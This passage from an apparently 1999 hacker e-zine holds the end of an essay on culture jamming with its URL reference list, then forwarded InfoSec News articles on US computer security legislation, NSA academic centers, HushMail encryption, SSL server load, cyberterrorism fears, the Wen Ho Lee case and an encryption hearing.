know Mr. Waldheim helped murder thousands of fellow humans during
something significant called World War II. The employees who were
responsible have been sacked.
The AVIC makes the very simple point that our contemporary culture is still capable
of electing mass-murderers as world leaders, a fact verified by the many ongoing
conflicts and genocides today.
The anti-meme highlights the absurdity and even the moral decay of the
mass-media meme:
Our society spends a lot of time telling us that there is some brand new,
fresh cultural produce, generated from thin air and sunshine, slick and
clean. They package it with pretty plastic & ribbons and then feed it to
us. A lot gets thrown away: the ribbons, the wrapping; culture becomes
garbage, or it dies, and rots behind the refrigerator. But the new fluffy
shiny stuff still gets churned out, and it gets forced between our teeth.
And we are told to swallow it.
We will not swallow. We will chew, and then spit. We will play with our
food, and create something new and interesting from it.
This is similar to the Adbusters "Is Economic Progress Killing Our planet"
campaign, and a host of other messages pointing to the waste and absurdity of the
economic order as it exists today.
The idea is to show that the sanitary culture presented in mass culture isn't the
sanitary and stain-free entity the messages proclaim it to be. "The possibility of
adding pimples to the retouched photo of the face on the cover of America are only
now being seen as artistic territory." The anti-message is very simple: this is not
good.
Corporate and cultural abuses are legion, from the Exxon Valdiz oil spill to the
Union Carbide poisoning of tens of thousands of people in Bhopal, India. Yet
criticism is mute. As the Overcoming Consumerism site observes,
The often asked question, "why doesn't the media talk about corporate
power?" and the frequent answer "because the corporations own the
media...", really is a simplification of a wide-ranging process of
power-sharing and wealth-retention that goes more to the kinds of
people behind the corporations than the actual corporations themself.
The anti-meme is an attack not only on corporate and government policies and
practises, but also on the media messages themselves. Hence, for example, we see
sites such as White Dot, which ask, "What do you do if you don't watch TV?"
References
Adbusters. Agency Website. http://adbusters.org
Adbusters. is Economic Progress Killing the Planet. Media campaign. 1999.
http://adbusters.org/progress/progress.html
Adbusters. Brits miss out on G8 Summit message. Press Release. 1999
http://www.adbusters.org/campaigns/economic-pressrelease.html
Advertising Age. Corporate Web Site. http://www.adage.com/
Alinsky, Saul. Titles, listed at Amazon.com.
http://www.amazon.com/exec/obidos/Author%3DAlinsky%2C%20Saul%20D.
/thecenterformediA/002-3999677-2858208
Apocalyptic Optimism for the End of History. Culture Jamming. Web Site.
http://www.abrupt.org/CJ/CJ.html
Baffler, The. Commodify your dissent. Magazine - counterculture ideas and
opinions. Purchase from http://www.dustygroove.com/baffler.htm
Home site at http://www.thebaffler.org/
Baumgertner, Peter, and Payr, Sabine. Learning as Action: A Social Science
Approach to the Evaluation of Interactive Media. CSS Journal Volume 5 Number 2 -
March/April, 1997. http://www.webcom.com/journal/baumgart.html
Bennahum, David. Meme. Mailing List Web Site. http://memex.org/welcome.html
Bennahum, David. Meme definition.
http://www.ed.cqu.edu.au/~bigumc/Meme/meme_definition.html
Big Brother Inside. Web Site. http://www.bigbrotherinside.com/
Billboard Liberation Front. Agency Web Site. http://www.billboardliberation.com
Bissett, Luther. 'Personal' home page. http://www.syntac.net/lutherblissett/
Bourroughs, William S. The Electronic Revolution.
http://www.syntac.net/dl/elerev2.html
Brooks, Meredith. Bitch. 1998. Columbia Records.
http://hollywoodandvine.com/starlandmotel/media/ram/video/
meredithbrooks-bitch.ram
First Annual St. Louis Santa Rampage. Web Site.
http://home.postnet.com/~cacophony/santa.htm
Canadian Broadcasting Corporation. Corporate Web Site. http://www.cbc.ca
Centre for Media and Democracy. Agency Web Site. http://www.prwatch.org/
Channel One Corporate Web Site. http://www.channelone.com
Chickenhead. Zine. http://www.chickenhead.com
CHUM Media Group. Corporate Web Site. http://www.chum.com
Church of the SubGenius. Home Page. http://www.subgenius.com/
Church of the SubGenius. We're the Happy People.
http://www.subgenius.com/bigfist/ answers/rants/ad/ad.html
Corcoran, Terence. Attack of the tomato killers. National Post, May 4, 1999.
http://www.nationalpost.com/financialpost.asp?s2=opinion&s3=
theeditor&f=990504/2555310.html
Corporation, The. Parody. http://www.thecorporation.com/
Corporation, The. Cyberbear. Parody. http://www.thecorporation.com/
runninggags/cyberbear/index.html
Critical Mess Media (CMM). Parody site. http://www.rootmedia.org/~messmedia/
Dawkins, Richard. The Selfish Gene. 1976. Book site with excerpts.
http://www.spacelab.net/~catalj/selfpage.htm
Dery, Mark. Culture Jamming: Hacking, Slashing and Sniping at the Empire of
Signs. http://web.nwe.ufl.edu/~mlaffey/cultcover.html
Detritus.net. Zine. Home Page. http://www.detritus.net/
English, Ron. POPaganda: Illegal Billboards. Web Site.
http://www.popaganda.com/Billboards/body_billboards.html
Ewan, Stewart Ewan PR! A Social Theory of Spin. Book Site.
http://www.bway.net/~drstu/
Fisher, Ebon. The Alula Dimension. Web Art. Be patient - dig through it.
http://www.users.interport.net/~outpost/ebon.html
Fisher, Ebon. Mess up your neighbours: The Weird Thing Zone
http://www.users.interport.net/~alula/weirdzone.html
Garton, Andrew. Breaking the Loop: A spoken word / performance lecture. Based
on the Internet/radio installation, Sensorium Connect. satellite Dispatch - Acustica -
2.01 http://www.toysatellite.com.au/news/acustica/201/01.html
Grytting, Wayne. Top NEWSPEAK Stories of the Month #113. Student Activists'
Network. May, 1999. http://san.tao.ca/san01800.html
Gurilla Media. Home Page. http://www.guerrillamedia.org/
Gurilla Media. National Post parody site. Parody. http://www.national-post.8m.com/
Gurilla Media. Conrad Black Envy. Parody. http://www.blackenvy.com/
habitat2@cycor.ca culture jamming before the polls in PEI! Sat, 9 Nov 1996.
http://www.tao.ca/earth/media-l/old/1/0051.html
Hacker's Dictionary, The. Meme
http://www.elsewhere.org/jargon/jargon_28.html#TAG1126
Happyclown, Inc. Parody site. http://www.happyclown.com/mainmenu.html
Hays, Constance L. Math Textbook Salted With Brand Names Raises New Alarm.
NY Times, March 21, 1999. http://metalab.unc.edu/stayfree/public/math_texts.html
Headspace. How to make Trouble and Influence - C is for Culture Jamming.
Headspace Issue #4. http://www.abc.net.au/arts/headspace/rn/bbing/trouble/c.htm
Henderson, Rich. Interview with Joe Matheny. Undated.
Hirsh, Jesse. Culture Jamming: Democracy Now Campus Life 114, November 11,
1998. http://www.campuslife.utoronto.ca/groups/varsity/archives/118/nov11/
feature/culture.html
Idiosyntactix Arts and Sciences Alliance. Home Page. http://www.syntac.net/
Idiosyntactix. Culture-Jammer's Enclyclopedia.
http://www.syntac.net/hoax/index.html
JunkBusters. Home Page. http://www.junkbusters.com/
Karrera, Adam. Virtual Slap: A Keynote Presentation Web Review, June 23, 1998
http://webreview.com/wr/pub/web98/tues/keynote.html
Klatte, Arline. "Hey Gang, Let's Put On A Show" Survival Research Labs up against
it...again SF Gate, July 6, 1998
http://www.sfgate.com/cgi-bin/article.cgi?file=/technology/archive/ 1998/07/06/srl.dtl
Lane, Randall. You are what you wear. Forbes, May 26, 1999.
http://www.forbes.com/forbes/101496/5809042a.htm
Laughing squid. Home Page. http://www.laughingsquid.com/
McDonalds. Corporate Web Site. http://www.mcdonalds.com
McLaren, Carrie. Review of the Baffler Issue 5. 1999?
http://metalab.unc.edu/pub/electronic-publications/ stay-free/7/baffler.htm
Mclaren, Carrie. Advertising the Uncommercial. Matador, Issue #6 - 1999?
Messmedia. DisConnection (DisCo). Parody site.
http://messmedia.rootmedia.org/disconnection/
National Post. The National Post. Corporate Web Site. http://www.nationalpost.com
Negativeland. Negativeworldwidewebland. Band Web Site.
http://www.negativland.com/
Nike. Corporate Web Site. http://www.nike.com
Overcoming Consumerism. Web Site.
http://www.hooked.net/users/verdant/index.htm
Positive Propaganda. Unsorted Banners. Ad Parodies.
http://www.honeylocust.com/positive/unsort.html
Practical Magic. Movie Web Site. 1998. Warner Brothers.
http://www.practicalmagic.com Public Broadcasting System. Corporate Web Site.
http://www.pbs.org
Principia Cybernetica Web. Memetics. http://pespmc1.vub.ac.be/memes.html
Quebec Public Interest Research Group Liberating Media: a weekend of culture
jamming, media, and community democracy. 1997.
http://www.tao.ca/earth/toronto/archive/1997/toronto00100.html
Reebok. Corporate Web Site. http://www.reebok.com
®TMark. Home Page. http://www.rtmark.com
®TMark. Full Projects List. http://www.rtmark.com/listallprojects.html
®TMark. Shell. (Note - often not listed by DNS Servers - go figure)
http://shell.rtmark.com
®TMark. G.W.Bush.com http://www.gwbush.com
saggau@earthlink.net Review of Rules for Radicals. Amazon.com, December 29,
1998. http://www.amazon.com/exec/obidos/ASIN/0679721134/
002-3999677-2858208
Seemen, The. Society web site. http://www.seemen.org
Sippey, Michael. Live or Memorex?. The Obvious, December 12, 1996.
http://www.theobvious.com/archives/021296.html
Stay Free! Magazine. Home Page. http://metalab.unc.edu/stayfree/
Stay Free! Issue #13 marketing to Kids. Zine.
http://metalab.unc.edu/stayfree/13/index.html
Stay Free! Issue #14 Interview with Stewart Ewan. Zine.
http://metalab.unc.edu/stayfree/14/ewen1.html
Tao. Home Page. http://www.tao.ca
Turner, John. Where Will They Strike Next?. Shift 7.3, May, 1999.
http://www.shift.com/shiftstd/html/onlineTOC/1999/7.3/ html/ArtMark1.html
Vanatta, Rob. Meredith Brooks Net. Fan Site. 1997, 1998.
http://web.csuchico.edu/~rvanatta/mbrooks/
Whalen, John. The Mayhem is the Message Metroactive Cyberscape - 1995.
http://www.metroactive.com/cyber/jamming.html
White Dot. Web Site. http://www.whitedot.org/welikeit.html
Woolley, Wayne. Florida reporter falls for phony Detroit gang hoax on Internet The
Detroit News, December 6, 1996.
http://detnews.com/cyberia/culture/961206/hoax/hoax.htm
ZNet. Anarchy Watch. Web Site. http://www.zmag.org/AWatch/awatch.htm
Email Stephen Downes at downes@newstrolls.com
copyright newstrolls.com 1999 all rights reserved!
@HWA
29.0 [ISN] House panel aims to bolster security law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 21 May 1999 00:58:50 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] House panel aims to bolster security law
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html
House panel aims to bolster security law
(Federal Computer Week) [5.20.99] WASHINGTON, D.C. -- The House Science
Committee plans to make another push to update a 1989 law that requires
civilian agencies to take measures to protect their computer systems,
according to Rep. Constance Morella (R-Md.), chairwoman of the Technology
Subcommittee of the House Science Committee.
The new bill, which could be introduced as early as next week, would
revamp the 10-year-old Computer Security Act. The bill will closely
resemble the Computer Security Enhancement Act of 1997, which the House
passed only to have it die in the Senate last year, said Morella, speaking
at a symposium sponsored by the SmartCard Forum.
Like the 1997 bill, the proposed legislation would tap the National
Institute of Standards and Technology as the lead agency for information
security. The preceding bill also would have required NIST to promote
federal use of commercial off-the-shelf products for civilian security
needs.
The committee first began its effort to revamp the existing law to reflect
the proliferation of network technology that has left agency data more
vulnerable to corruption and theft, Morella said in 1997.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
30.0 [ISN] NSA Taps Universities For Info Security Studies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 21 May 1999 01:13:40 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] NSA Taps Universities For Info Security Studies
Forwarded From: SpyKing@con2.com
NSA Taps Universities For Info Security Studies
The National Security Agency has designated seven U.S. universities as
centers for information-security education, the agency said Tuesday. The
NSA, a super-secret spy agency that wields broad power over U.S.
encryption policy, named two private Virginia universities and a handful
of state universities as Centers of Academic Excellence in Information
Assurance Education. They are: James Madison University, George Mason
University, Idaho State University, Iowa State University, Purdue
University, University of California at Davis, and the University of
Idaho.The centers are expected to become "focal points for recruiting, and
may create a climate to encourage independent research in information
assurance," the NSA said.The agency said the decision to launch the
information-assurance program represented an attempt to reach out and form
partnerships with industry pursuant to a Clinton administration directive
last year on critical infrastructure protection.The seven centers will be
formally recognized during a conference on information-security systems
scheduled for May 25 to 29 at IBM's conference facility in Palisades, N.Y.
<http://www.techweb.com/wire/story/TWB19990512S0005 >
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
31.0 [ISN] HushMail: free Web-based email with bulletproof encryption
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 22 May 1999 06:16:04 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] HushMail: free Web-based email with bulletproof encryption
Forwarded From: Keith Dawson <dawson@world.std.com>
1999-05-19:
..HushMail: free Web-based email with bulletproof encryption
Hush Communications has quietly begun beta testing a significant
development in email privacy. HushMail [1] works like Hotmail or
Rocketmail -- you can set up multiple free accounts and access them from
any Web browser anywhere -- but when you email another HushMail user your
communication is protected by unbreakable encryption. The crypto,
implemented in a downloadable Java applet, was developed outside of US
borders and so has no export limitations.
Here are the FAQ [2] and a more technical overview [3] of the Hush- Mail
system.
HushMail public and private keys are 1024 bits long, and are stored on a
server located in Canada. All information sent between the HushApplet and
the HushMail server is encrypted via the Blowfish symmetric 128-bit
algorithm. The key to this symmetric pipe is randomly generated each
session by the server and is transferred to the client machine over a
secure SSL connection.
When you sign on as a new user you can choose an anonymous account or an
identifiable one. For the latter you have to fill out a demographic
profile, to make you more attractive (in the aggregate) to HushMail's
advertisers. The HushApplet walks you through generating a public-private
key-pair. The process is fun and slick as a smelt. You need to come up
with a secure pass-phrase, and in this process HushMail gives only minimal
guidance. You might want to visit Arnold Reinhold's Diceware page [4],
where he lays out a foolproof pass- phrase protocol utilizing a pair of
dice.
HushMail relies heavily on Java (JVM 1.1.5 or higher), so it can only be
used with the latest browsers. The earliest workable version of Netscape's
browser is 4.04, but some features don't work in versions before 4.07; the
latest version, 4.5, is best. For Internet Explorer users, 4.5 is
recommended, but the latest Windows release of IE 4.0 (subversion
4.72.3110) works as well. Red Hat Linux version 5.2 is also tested and
supported. Unfortunately, HushMail does not work on Macintoshes, due to
limitations in Apple's Java implementation. (Mac users can crawl HushMail
under Connectix Virtual PC. Note that I don't say "run." I've tried this
interpretation-under-emulation and do not recommend it.) The company is
trying urgently to connect with the right people at Apple to get this
situation remedied.
One of the limitations of this early release of HushMail is that
encryption can only be used to and from another HushMail account. It is
not currently possible to export your public/private key-pair, to set up
automatic forwarding of mail sent to a HushMail account, or to import
non-Hush public keys. I spoke with Cliff Baltzley, Hush's CEO and chief
technical wizard. He stresses that Hush's desire and intention is to move
toward interoperability with other players in the crypto world, such as
PGP and S/MIME. The obstacles to doing so are the constraints on technical
resources (read: offshore crypto programmers) and legal questions of
intellectual property. Baltzley believes that HushMail's positive impact
on privacy worldwide will be enhanced by maximizing the product's
openness.
[1] https://www.hushmail.com/
[2] https://www.hushmail.com/faq.htm
[3] https://www.hushmail.com/tech_description.htm
[4] http://world.std.com/~reinhold/diceware.html
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
32.0 [ISN] E-Biz Bucks Lost Under SSL Strain
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 22 May 1999 06:17:04 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] E-Biz Bucks Lost Under SSL Strain
http://www.internetwk.com/lead/lead052099.htm
Thursday, May 20, 1999
E-Biz Bucks Lost Under SSL Strain
By TIM WILSON
A customer stuffs his shopping cart with goodies from your Web site.
Credit card in hand, he waits for a secure connection to consummate the
deal. And waits. Finally, short of patience, he dumps the contents and
logs off.
It may sound like an e-commerce manager's nightmare, but according to the
latest Web server performance statistics, it's an increasingly common
phenomenon.
The ghost in the machine is Secure Sockets Layer, the commonly used method
of securing communications between users and Web sites.
Recent tests conducted by researcher Networkshop Inc. indicate that
powerful Web servers capable of handling hundreds of transactions per
second may be brought to a near standstill by heavy SSL traffic. Some
server configurations suffered as much as a fiftyfold degradation in
performance from SSL, down to just a few transactions per second,
according to analyst Alistair Croll at Networkshop.
The growing problem of SSL performance has driven vendors to develop
devices that can help share the Web server's processing load. IPivot Inc.
next month will ship two new processors that can offload authentication
and encryption on e-commerce sites.
IT managers and other experts have known for years that SSL, which
requires the authentication and encryption of Web server connections, can
significantly slow site performance. But the problem is rapidly becoming
more chronic as companies increase secured Web transactions, they said.
"Our business is very seasonal, and a lot of it is concentrated in the
fourth quarter. This past December, we found ourselves shuffling servers
around to handle the load," said Stephen McCollum, network architect at
Hewitt Associates. The $858 million company manages benefits plans for
large organizations, and because Hewitt's Web traffic is personal and
confidential, virtually all of it is conducted via SSL.
Hewitt is far from alone in its reliance on SSL. According to a study
conducted by research company Netcraft Ltd., SSL implementations doubled
from 15,000 sites to more than 35,000 sites between 1998 and 1999. And
many of those server sites are struggling under the load.
"I'd guess that somewhere between 10 and 25 percent of [e-commerce]
transactions are aborted because of slow response times," said Rodney
Loges, vice president of business development at Digital Nation, a Web
hosting company.
That translates to as much as $1.9 billion in lost revenue, using
Forrester Research numbers for 1998 of $7.8 billion in e-retail sales.
According to Networkshop, even the most powerful, general-purpose Web
server hardware can be dragged down by large volumes of SSL traffic. In
its most recent tests, the research company found that a typical Pentium
server configuration running Linux and Apache, which at full capacity can
handle about 322 connections per second of standard HTTP traffic, fell to
about 24 connections per second when handling a full load of SSL traffic.
A similar test conducted on a Sun 450 server running Solaris and Apache
experienced even more trouble. The server handled about 500 connections
per second of HTTP traffic at full capacity, but only about 3 connections
per second when the traffic was secured via SSL. Networkshop tests of
quad-processor configurations showed that those performance ratios scale
to multiserver environments as well, Croll said.
A few vendors, such as Rainbow Technologies Inc., have solved the problem
by offloading security processing onto a dedicated co-processor card that
slips into a server. But as SSL traffic increases, adding and managing
co-processor boards becomes unwieldy, IT managers said. "We found that the
[co-processor] cards were kind of a kludge, because they have to be added
to every server," said Digital Nation's Loges.
IPivot will begin shipping two external SSL processors--the Commerce
Accelerator 1000 and the Commerce Director 8000, which includes IPivot's
load-balancing system--to help eliminate SSL bottlenecks.
The Commerce Accelerator 1000 is priced at $9,995; the Commerce Director
8000 costs $39,950.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
33.0 [ISN] Bracing for guerrilla warfare in cyberspace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 22 May 1999 06:22:31 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Bracing for guerrilla warfare in cyberspace
[Moderator: Warning - A fair share of FUD in this article.]
Forwarded From: Sunit Nangia <sunit@cerf.net>
http://www.cnn.com/TECH/specials/hackers/cyberterror/
Bracing for guerrilla warfare in cyberspace
'There are lots of opportunities; that's very scary'
April 6, 1999
By John Christensen
CNN Interactive
(CNN) -- It is June, the children are out of school, and as highways and
airports fill with vacationers, rolling power outages hit sections of Los
Angeles, Chicago, Washington and New York. An airliner is mysteriously
knocked off the flight control system and crashes in Kansas.
Parts of the 911 service in Washington fail, supervisors at the Department
of Defense discover that their e-mail and telephone services are disrupted
and officers aboard a U.S. Navy cruiser find that their computer systems
have been attacked.
As incidents mount, the stock market drops precipitously, and panic surges
through the population.
Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism
czar Richard A. Clarke fears is not just a threat, it has already
happened.
Much of the scenario above -- except for the plane and stock market
crashes and the panic -- occurred in 1997 when 35 hackers hired by the
National Security Agency launched simulated attacks on the U.S.
electronic infrastructure.
"Eligible Receiver," as the exercise was called, achieved "root level"
access in 36 of the Department of Defense's 40,000 networks. The simulated
attack also "turned off" sections of the U.S. power grid, "shut down"
parts of the 911 network in Washington, D.C., and other cities and gained
access to systems aboard a Navy cruiser at sea.
At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a
Senate technology subcommittee, reported that nearly two-thirds of U.S.
government computers systems have security holes.
"If somebody wanted to launch an attack," says Fred B. Schneider, a
professor of computer science at Cornell University, "it would not be at
all difficult."
'There are lots of opportunities'
Although "Eligible Receiver" took place in the United States, which has
about 40 percent of the world's computers, the threat of cyberterrorism is
global.
Consider:
* During the Gulf War, Dutch hackers stole information about U.S. troop
movements from U.S. Defense Department computers and tried to sell it to
the Iraqis, who thought it was a hoax and turned it down.
* In March 1997, a 15-year-old Croatian youth penetrated computers at a
U.S. Air Force base in Guam.
* In 1997 and 1998, an Israeli youth calling himself "The Analyzer"
allegedly hacked into Pentagon computers with help from California
teen-agers. Ehud Tenebaum, 20, was charged in Jerusalem in February 1999
with conspiracy and harming computer systems.
* In February 1999, unidentified hackers seized control of a British
military communication satellite and demanded money in return for control
of the satellite.
The report was vehemently denied by the British military, which said all
satellites were "where they should be and doing what they should be
doing." Other knowledgable sources, including the Hacker News Network,
called the hijacking highly unlikely.
"There are lots of opportunities," says Schneider. "That's very scary."
'The Holy Grail of hackers'
President Clinton announced in January 1999 a $1.46 billion initiative to
deal with U.S. government computer security -- a 40 percent increase over
fiscal 1998 spending. Of particular concern is the Pentagon, the military
stronghold of the world's most powerful nation.
"It's the Holy Grail of hackers," says computer security expert Rob Clyde.
"It's about bragging rights for individuals and people with weird
agendas."
Clyde is vice president and general manager of technical security for
Axent Technologies, a company headquartered in Rockville, Maryland, that
counts the Pentagon as one of its customers.
The Defense Department acknowledges between 60 and 80 attacks a day,
although there have been reports of far more than that.
The government says no top secret material has ever been accessed by these
intruders, and that its most important information is not online. But the
frustration is evident.
Michael Vatis, director of the FBI's National Infrastructure Protection
Committee, told a Senate subcommittee last year that tracing cyberattacks
is like "tracking vapor."
'A lot of clueless people'
Schneider says the "inherently vulnerable" nature of the electronic
infrastructure makes counterterrorism measures even more difficult.
Schneider chaired a two-year study by the National Academy of Sciences and
the National Academy of Engineering that found that the infrastructure is
badly conceived and poorly secured.
"There is a saying that the amount of 'clue' [knowledge] on the Internet
is constant, but the size of the Internet is growing exponentially," says
Schneider. "In other words, there are a lot of clueless people out there.
It's basically a situation where people don't know how to lock the door
before walking out, so more and more machines are vulnerable."
Schneider says the telephone system is far more complicated than it used
to be, with "a lot of nodes that are programmable, and databases that can
be hacked." Also, deregulation of the telephone and power industries has
created another weakness: To stay competitive and cut costs, companies
have reduced spare capacity, leaving them more vulnerable to outages and
disruptions in service.
Still another flaw is the domination of the telecommunications system by
phone companies and Internet service providers (ISPs) that don't trust
each other. As a result, the systems do not mesh seamlessly and are
vulnerable to failures and disruptions.
"There's no way to organize systems built on mutual suspicion," Schneider
says. "We're subtly changing the underpinnings of the system, but we're
not changing the way they're built. We'll keep creating cracks until we
understand that we need a different set of principles for the components
to deal with each other."
'The democratization of hacking'
Meanwhile, the tools of mayhem are readily available.
There are about 30,000 hacker-oriented sites on the Internet, bringing
hacking -- and terrorism -- within the reach of even the technically
challenged.
"You no longer have to have knowledge, you just have to have the time,"
Clyde says. "You just download the tools and the programs. It's the
democratization of hacking. And with these programs ... they can click on
a button and send bombs to your network, and the systems will go down."
Schneider says another threat is posed not by countries or terrorists, but
by gophers and squirrels and farmers.
In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking
out 60 percent of the regional and long distance phone service in New York
City and air traffic control functions in Boston, New York and Washington.
In 1996, a rodent chewed through a cable in Palo Alto, California, and
knocked Silicon Valley off the Internet for hours.
"Although the press plays up the security aspect of hacker problems,"
says Schneider, "the other aspect is that the systems are just not built
very reliably. It's easy for operators to make errors, and a gopher
chewing on a wire can take out a large piece of the infrastructure. That's
responsible for most outages today."
'The prudent approach'
Schneider and Clyde favor a team of specialists similar to Clinton's
proposed "Cyber Corps" program, which would train federal workers to
handle and prevent computer crises. But they say many problems can be
eliminated with simple measures.
These include "patches" for programs, using automated tools to check for
security gaps and installing monitoring systems and firewalls. Fixes are
often free and available on the Internet, but many network administrators
don't install them.
A step toward deterrence was taken in 1998 when CIA Director George Tenet
announced that the United States was devising a computer program that
could attack the infrastructure of other countries.
"That's nothing new," says Clyde, "but it's the first time it was publicly
announced. If a country tries to destroy our infrastructure, we want to be
able to do it back. It's the same approach we've taken with nuclear
weapons, the prudent approach."
The U.S. Government Accounting Office estimates that 120 countries or
groups have or are developing information warfare systems. Clyde says
China, France and Israel already have them, and that some Pentagon
intrusions have surely come from abroad.
"We don't read about the actual attacks," says Clyde, "and you wouldn't
expect to."
"The Analyzer" was caught after he bragged about his feat in computer chat
rooms, but Clyde says the ones to worry about are those who don't brag and
don't leave any evidence behind.
"Those are the scary ones," he says. "They don't destroy things for the
fun of it, and they're as invisible as possible."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
34.0 [ISN] Prosecuting Lee Is Problematic
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 00:05:43 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Prosecuting Lee Is Problematic
http://www.washingtonpost.com/wp-srv/WPlate/1999-05/24/080l-052499-idx.html
Prosecuting Lee Is Problematic
Physicist's Mishandling of Computer Data May Not Be Crime
By Vernon Loeb and Walter Pincus
Washington Post Staff Writers
Monday, May 24, 1999; Page A05
Espionage suspect Wen Ho Lee's transfer of top secret computer programs
from a classified to a vulnerable computer network at Los Alamos National
Laboratory has left federal prosecutors wrestling with the question of
whether such mishandling of classified information in cyberspace
constitutes a crime.
Lacking evidence of espionage, FBI agents have focused on Lee's
unauthorized data transfer ever since they searched his desktop computer
in March and discovered top secret "legacy codes" in a system that could
have been accessed by hackers.
But there is no known prosecution of anyone for transferring classified
data from classified to unclassified government computer systems, leaving
prosecutors to fathom the frontiers of cybersecurity under espionage
statutes that make no reference to computers, according to lawyers
specializing in national security law and U.S. officials familiar with the
case.
Lee, 59, a Taiwan-born nuclear physicist who is a U.S. citizen, was fired
March 8 for alleged security violations at Los Alamos and identified by
U.S. officials as an espionage suspect, despite their inability to charge
him as a spy for China. Congress is investigating why the FBI and the
Justice Department failed to search his office computer prior to his
dismissal.
That slow response drew more criticism yesterday. The chairman of the
Senate intelligence committee, Richard C. Shelby (R-Ala.), renewed his
call for the ouster of Attorney General Janet Reno. Branding her handling
of the case "indefensible," Shelby said on CBS's "Face the Nation" that
"the attorney general ought to resign and she ought to take her top
lieutenants with her."
On the same show, Sen. Robert G. Torricelli (D-N.J.) also criticized Reno,
although he stopped short of advocating resignation: "It's time for
President Clinton to have a conversation with the attorney general about
her ability to perform her duties and whether or not it is in the national
interest for her to continue." Torricelli said Reno had displayed
"failures of judgment" that were "inexplicable." He singled out her
decision not to approve a wire tap of Lee "despite overwhelming evidence
that there was probable cause and that the national security was being
compromised."
White House spokesman Barry Toiv said Clinton "has full confidence in
Attorney General Reno," Reuters reported.
Lee has denied passing classified information to China and has said
through his attorney he took "substantial steps" to safeguard the
transferred computer codes.
A provision of the federal espionage statute makes the removal of
classified defense information from its "proper place of custody" through
"gross negligence" a felony punishable by up to 10 years in prison,
according to lawyers specializing in national security cases.
But it is unclear whether Lee could be charged under that provision,
absent intent on his part to make unlawful use of the data or evidence it
was obtained by unauthorized individuals, they said.
"You've got a clear security breech," said former CIA inspector general
Frederick Hitz. "But as far as a criminal prosecution . . . I would think
that's going to be tough."
Another law makes the "unauthorized removal and retention of classified
documents or material" at one's home a misdemeanor punishable by a maximum
$1,000 fine and one-year prison sentence. The measure was enacted to
safeguard classified materials against careless handling, not espionage.
Two former National Security Agency employees, a husband and wife, were
the first to be prosecuted under the law last year, pleading guilty to
having retained classified documents at their home after leaving
government service.
But the lawyers specializing in national security cases say they do not
believe the statute could be used against Lee, because he apparently did
not remove the programs from government property.
They said in two recent cases involving computer transfers of classified
information, one involving another Los Alamos scientist and the other,
former CIA director John M. Deutch, the Justice Department declined
prosecution.
The scientist at Los Alamos, who has not been publicly identified, moved
classified nuclear weapons data last year from the laboratory's classified
to its unclassified network in a transfer analogous to that performed by
Lee.
But the transfer was ultimately determined to have been "inadvertent,"
according to a senior Energy Department official. The FBI found no
criminal intent and closed the case, the official said.
Deutch was investigated by the Justice Department for transferring more
than 30 classified documents to his personal, unsecured laptop during his
tenure as CIA director from May 1995 to December 1996. The security breach
was discovered when CIA specialists went to his Washington home to remove
a classified computer and safe and discovered the classified files on his
personal computer.
Under CIA policy, Deutch's security violation was forwarded to Justice for
review, but officials there declined prosecution. The case was recently
recently returned to the CIA for review by Inspector General Britt Snider,
who is expected to complete a report on the matter soon.
Deutch, who does government consulting and teaches at Massachusetts
Institute of Technology, could have his security clearance lifted for a
period of time, one government source said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
35.0 [ISN] Slip of the Tongue Lightens up Encryption Hearing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 00:01:24 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Slip of the Tongue Lightens up Encryption Hearing
http://www.nytimes.com/library/tech/99/05/cyber/articles/25capital.html
May 25, 1999
Slip of the Tongue Lightens up Encryption Hearing
By JERI CLAUSING
WASHINGTON - The Clinton Administration's point man on encryption policy
silenced his Congressional critics - momentarily, anyway -- with a slip
of the tongue at a House hearing last week.
"Never underestimate the stupidity of some of the people we have to deal
with," William A. Reinsch, Under Secretary of Commerce for the Bureau of
Export Administration, said while being grilled about whether terrorists
and criminals would be naïve enough to use the technology being pushed by
the Administration.
The House International Relations subcommittee meeting fell silent and
Reinsch turned bright red as he realized the double meaning of what he had
